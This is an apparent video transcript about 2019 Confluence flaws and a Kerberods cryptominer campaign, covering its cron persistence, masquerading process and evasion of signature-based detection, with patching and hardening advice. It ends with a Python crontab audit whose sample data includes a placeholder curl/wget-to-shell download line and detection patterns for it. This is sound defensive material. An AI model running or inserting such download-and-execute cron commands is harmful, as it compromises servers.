Confluence is an open and shared workspace. Create, collaborate, and keep all your work in one place. Unlike document and file sharing tools, Confluence is open and accessible, helping your team and your company do their best to work together. If you haven't heard of Confluence, it is a popular shared workspace environment. You know, I was reading the marketing speak here. And it's a popular project. A lot of people have messaged me and said, oh, you should be using Confluence for your stack, et cetera, et cetera. But I chose to use Wiki instead because I do prefer an open source system. And Confluence is reasonable and does very Wiki-like features, but is not open source. Also, from anyone I've talked to that has directly worked with Confluence, they tell me it's rather difficult to update. It's not as easy as just loading an update. Now, this could be subjective based on that, but I know there's companies that told me that they have a lot of problems. So every time they update it, it breaks this, it breaks that, breaks customizations, and it's built on, I believe it's still running all on Apache Tomcat, and even installing an SSL certificate is a little bit tricky. And so a lot of people put a proxy in front of it, et cetera, et cetera. Now, like any mature product, this is not a dig on Confluence, but there are security advisories or flaws found, and this is part of the life cycle, and they were properly disclosed. And we have a couple of recent ones in March and April of 2019 here, both of them quite severe, critical, in that they allowed attackers outside, if you have this public facing, to get in and kind of make a mess of the server. And I'll leave links to all these too if you wanna read the details of the vulnerability. And I wanted to do a check to see just how many of these Confluence instances Shodan could see public facing. So this is a Shodan search for HTTP component Atlassian Confluence. And wow, there's 22,000 installs.
So there's quite a few of these public facing. I bring all this up because frequently people install things, stand up the servers and start using them, but then never ever patch them. And any tool that doesn't have auto patch management probably needs a technician to patch it, but then they don't wanna spend the money on a technician. And then we get fun write-ups like this: ignoring Atlassian Confluence security advisories. So, the reason I wanna cover this is to show some of the flaws with signature-based things. And this is really interesting because this was just written and published, well, just the other day; it was published on 4/19. And here we are at 4/23, April 23rd, and we still don't have proper detection of some of this, and let me explain. So this write-up walks through exactly each step of this system. First, they pop the, probably the WebDAV problem in Confluence that allowed them to execute a command on there. They had a Pastebin set up, which, Pastebin's been taken down, but basically they issued a cron job that said, hey, go ahead and download this tool and kick it off. And it looks like the Confluence security advisory, this is the 3/21, so not even the 4/17 Confluence post. So it does this, kicks it off, and I'll leave links to this as well so you can follow through in detail, grabs this. Now, the next step it does is kind of interesting. So this little script it grabs from Pastebin, and it adds a cron job to keep running until it gets everything set up. It goes through and looks for other malware on this server, and I guess it's one of those things that makes a lot of sense when you look at it from this perspective: if I got in a server, probably a lot of other people did get in the server, so let's go ahead and eliminate their malware because I want my malware to run.
And specifically, this is a crypto miner, which is why they showed the notice was your machine might be pwned, because all of a sudden it's under high load and it wasn't before. That's an attack vector sometimes that, well, not attack vector, a notice of attack is the fact that, oh, wow, look, my machine's suddenly under heavy load, or you see a lot of traffic that wasn't there before. Those are indicative of problems. And I'm gonna guess that they weren't running anything like OSSEC or Wazuh or any other intrusion detection or Tripwire, anything to look for modified files on here that would have let them know that, hey, something just changed on the server, did you change it? My guess is they weren't because, well, server load, it sounds like it was the indicator that there was a problem. So the next thing it's gonna do is pull down and figure out what version of Linux it's running and go from there. So it knows, okay, which version of Linux, what is the best tool to load? So it does some detection. Now, I do like that they, instead of the, if you're not familiar, one of the processes is Kerberos that you can have running, it calls itself kerberods. And because, you know, it looks close enough in spelling, you might not, you might run a list of applications running, a list of tasks running on the system, and go, oh, that looks like Kerberos, and just skip over it. Now, this is the part I wanted to talk about, the payload, which is still available on April 23rd on GitHub. And I did some research into this. And so here is the raw GitHub user Atomisa, eight, I don't know, AIKA, we'll just show links here. I'm not good at pronouncing however they want. I don't know how that was supposed to be pronounced, or if it was in 125.tmp. And it downloads this file, and then it's gonna try to execute this, and it runs through, and this is the rest of the script. This is the part that gets interesting.
And I will further talk real quick though about the mitigation process: do not run software as privileged users. There's some good tips in here, but I will also say I would have nuked and paved the server. Once any server's been popped, grab the database, back it up, reinstall all the applications and put the database back. That's one of your best bets if a server gets popped. That's one thing they did, a clean up, but to me, nuke and pave is one of my favorite ways to deal with servers, because you don't know if they left one little file somewhere that you didn't notice, especially if you don't have proper logging and you can't traverse everything they did. But let's talk about that GitHub repository that's still here. So here is the GitHub repository: 125.tmp, 125.mt, 225 and 225.mt and readme, the initial commit. Now, this is one of the challenges. First, they use GitHub. Why did they use GitHub? Because if they used some really weird URL and there was any type of monitoring going on, they would have seen, unusual URL, let's think about that and block it. Why do you, but with GitHub, I like this "Why GitHub" right at the top right here. GitHub is common for a lot of the scripts we run, including some automated Ansible scripts that I've said before, and I've talked about these; like, even my dotfiles are on GitHub. And so GitHub doesn't really flag anything. And because most things are encrypted, it becomes very, very hard to see them. But let's break down a little further. I took the URL, this actual download link of the file, raw.githubusercontent and then the link here. And Kaspersky is the only place flagging this as malware. And I thought that was interesting. Now this is URL, not file detection. This is a different animal here. But it's weird that Kaspersky actually does flag it. And this URL was checked on 4/18. So pretty recently, actually before this other person's published work, but there is a chance that this person is the same person who uploaded it here.
But yeah, they do find some problem with it. They see there's definitely some type of problem with this. And so Kaspersky flags it while other ones did not. So I thought that was interesting. Now this is a URL flag, not a flag of the actual software. So all these passed that URL perfectly fine. And like I said, you can't just block the, you can't just automatically say I'm gonna block GitHub because, well, you would break a lot of scripts out there. So let's go ahead and look at what the file is. And someone has uploaded this file on 4/21, probably that researcher, but 30 engines do detect this file. But that's not all the engines; some still don't. And this is one of the big problems all the time with using any type of signature-based system. We have to wait for these signatures to get on there. But, you know, a lot of things do detect it and a handful of things don't. But I'll give a break to places like Malwarebytes and Microsoft and some of those, not really a break, but they're focused on not Linux back doors, they're focused on Windows detection. So a lot of these, please note that this is specifically a Linux binary, not a Windows one. So that does make a big difference on the detection or even the desire to have those signatures. I mean, they should have all the signatures, you know, we're doing signature-based things, but the other side of it too, like I said, these are ELF binaries. So they're Linux slash, you know, Unix style, not Windows. So not everything's going to do it. But either way, it does find it, it does have the load segments as a breakdown of what's inside of it, and it does the detection. Next, the 225.tmp. So here's the other file, the 225.tmp. Nothing flags that, not even Kaspersky. So that's still marked as clean. So if someone were to try to filter for any of this, they would still be doing it. Still be able to pull that down on there. And then I pulled up, this is like the payload, how it grabs it, I was just digging in there.
So some of the other ones, like .vm, they're not binaries, they're just scripts that, you know, javelling, runtime, pull this, pull this content and run, you know, def 1sh back, you know, how we showed it inside of this here. Now, one of the other things I had tested was I spun up a demo environment and checked Suricata. Even though there's signatures for this file and things like that, this is one of the things I want to make sure we point out: it didn't even, I turned off SSL. I downgraded it and grabbed this file without SSL just so Suricata could see it. Nothing, doesn't find it. So, you know, I spun up the VM, downloaded it, pulled it through. And this is one of those things that a lot of people think, oh, but this will protect you. This will, you know, having the firewall and the endpoint, and we can just manage with a SIEM tool and things like that. And this is one of my points: the first and most important part is keeping your application stack up to date. We've covered this in the "how they got hacked" videos, where the recent hack with one of the, with the Matrix, it was all about them not updating one module. One module led to the downfall of everything else, because once they get in, traversal becomes a lot easier, or, you know, they only popped one server in this particular case based on the write-up, but you can still see how much of a problem this is, where all the, you can have all the cool, fancy firewall, endpoint protection, Suricata pulling full, you know, signatures and everything else. And this has been out for a few days. So sure, there's a signature hopefully for this, that particular file. So it sees the file passing through and it just doesn't flag it.
It just goes right through there, and not to mention, because it's signature-based, if they have the source code to any of these, and frequently the source code to many of these tools gets released, they make one minor change to the source code, and now the signature doesn't match, and now it installs just, just as well. So, yeah, so let's, you know, one time run over again this mitigation and good practice: do not run software as a privileged user. This is a huge problem because you gain the permission of whatever the server is. And too many people do this; they don't take the time to figure out why it won't run as its own user or solve whatever problem because it needs access to something. So they just go, I'll just run Apache Tomcat and Confluence as root because it now works perfectly fine. That is, that's the problem. Do not store SSH keys on the server to connect to other servers. That is absolutely critical. Don't leave your SSH keys on there and then allow them to hop to the other servers. That is just important. Follow security advisories and regularly update your operating system. That almost seems obvious. Uninstall unneeded software. You know, least access. This is, any time I'm building a server, someone asks if I use a template, no. And the reason I don't, I mean I have like general things I load that I need, like log tools and stuff like that. But when it comes to the applications that run on there, is there Samba running on my Wiki server? Absolutely not. It doesn't need it. You slowly build any application server with only the applications you need and not a single one more. Log analysis tools are a little bit different because they're not running applications, and it also helps to have those readily available on the server to go through and parse logs for troubleshooting or to find processes that are running that shouldn't be. But yeah, monitor the server and check log files automatically.
And I'll go as far as to saying, you know, having something like Wazuh, OSSEC, anything, Tripwire, there's different tools you can use to look for modification of the server. A cron process added that you didn't add is a bad thing. And how were they able to add a cron process? Well, it was running as root and it gave them the privilege to do so. So this is also, you know, just a few warnings. I hate warning compliments server attack. I like that here. So this is some of the write-ups you can read. I'll leave links to all this. So you can do further reading for the investigation. But the basics, and that's one of the things we talk about a lot in the company security. The basics of just keeping the server up to date is enough, well, let's say enough, but it definitely puts you way ahead of the curve of a lot of other people. As generally speaking, when someone's using a lot of these tools, they're automating this; they're pulling a Shodan list of 22,000 servers and they go look for all the outdated ones. If you have an updated one, they're like, that's harder. So we'll just let the bot take down all the other ones that are floating around out here that are unpatched. So that's why so much of security is sometimes easier than you think. It's complicated to unhack a server. It's complicated to find these things. But keeping your servers up to date and keeping all your stuff on the latest versions and keeping up with these security advisories, while it does take some active participation for you to make sure everything gets patched, it is absolutely worth it. And hopefully we're not doing a write-up about you, or at least here's what you're talking about, your server's getting popped. All right, thanks. And if you want to continue the discussion, head over to our forums. Thanks for watching. If you liked this video, give it a thumbs up.
If you want to subscribe to this channel to see more content, hit that subscribe button and the bell icon, and maybe YouTube will send you a notice when we post. If you want to hire us for a project that you've seen or discussed in this video, head over to LawrenceSystems.com where we offer both business IT services and consulting services and are excited to help you with whatever project you want to throw at us. Also, if you want to carry on the discussion further, head over to forums.lawrencesystems.com where we can keep the conversation going. And if you want to help the channel out in other ways, we offer affiliate links below which offer discounts for you and a small cut for us that does help fund this channel. And once again, thanks again for watching this video, and see you next time.
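The video points out that a cron job you did not add, especially one that downloads from a paste site or raw-content host and pipes it to a shell, is the kind of change a file-integrity or host-monitoring tool should catch. As an added example (not from the video or the write-up it discusses), here is a small Python audit that compares a crontab against a known-good baseline and flags that download-and-execute pattern; the hostnames, paths and baseline entries are constructed for illustration.

```python
import re

# Constructed baseline of cron entries the operator knows about (example data).
BASELINE = {
    "0 2 * * * /usr/local/bin/backup-db.sh",
    "*/5 * * * * /usr/local/bin/check-disk.sh",
}

# Constructed crontab as it might look after an intrusion; the URLs are placeholders.
CURRENT_CRONTAB = """\
0 2 * * * /usr/local/bin/backup-db.sh
*/5 * * * * /usr/local/bin/check-disk.sh
*/10 * * * * (curl -fsSL https://pastebin.example/raw/PLACEHOLDER || wget -q -O- https://raw.githubusercontent.com/PLACEHOLDER/x/125.tmp) | sh
# a harmless comment line
"""

# Heuristics a defender would alert on: a fetch tool whose output is piped into a shell,
# and references to paste or raw-content hosts that are rarely legitimate in cron.
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
PASTE_HOSTS = re.compile(r"(pastebin\.|raw\.githubusercontent\.com|transfer\.sh)")


def audit_crontab(text, baseline):
    """Return a list of (entry, reasons) for cron entries that are not in the
    baseline or that match the download-and-execute heuristics."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        reasons = []
        if line not in baseline:
            reasons.append("not in baseline")
        if DOWNLOAD_TOOLS.search(line) and PIPE_TO_SHELL.search(line):
            reasons.append("downloads remote content and pipes it to a shell")
        if PASTE_HOSTS.search(line):
            reasons.append("references a paste/raw-content host")
        if reasons:
            findings.append((line, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in audit_crontab(CURRENT_CRONTAB, BASELINE):
        print("ALERT:", entry)
        for reason in reasons:
            print("   -", reason)
```

On a real host you would feed it the output of `crontab -l` for each user plus the files under `/etc/cron*`, and treat any "not in baseline" hit as something to investigate rather than a block decision, since, as the video notes, GitHub itself cannot simply be blocked.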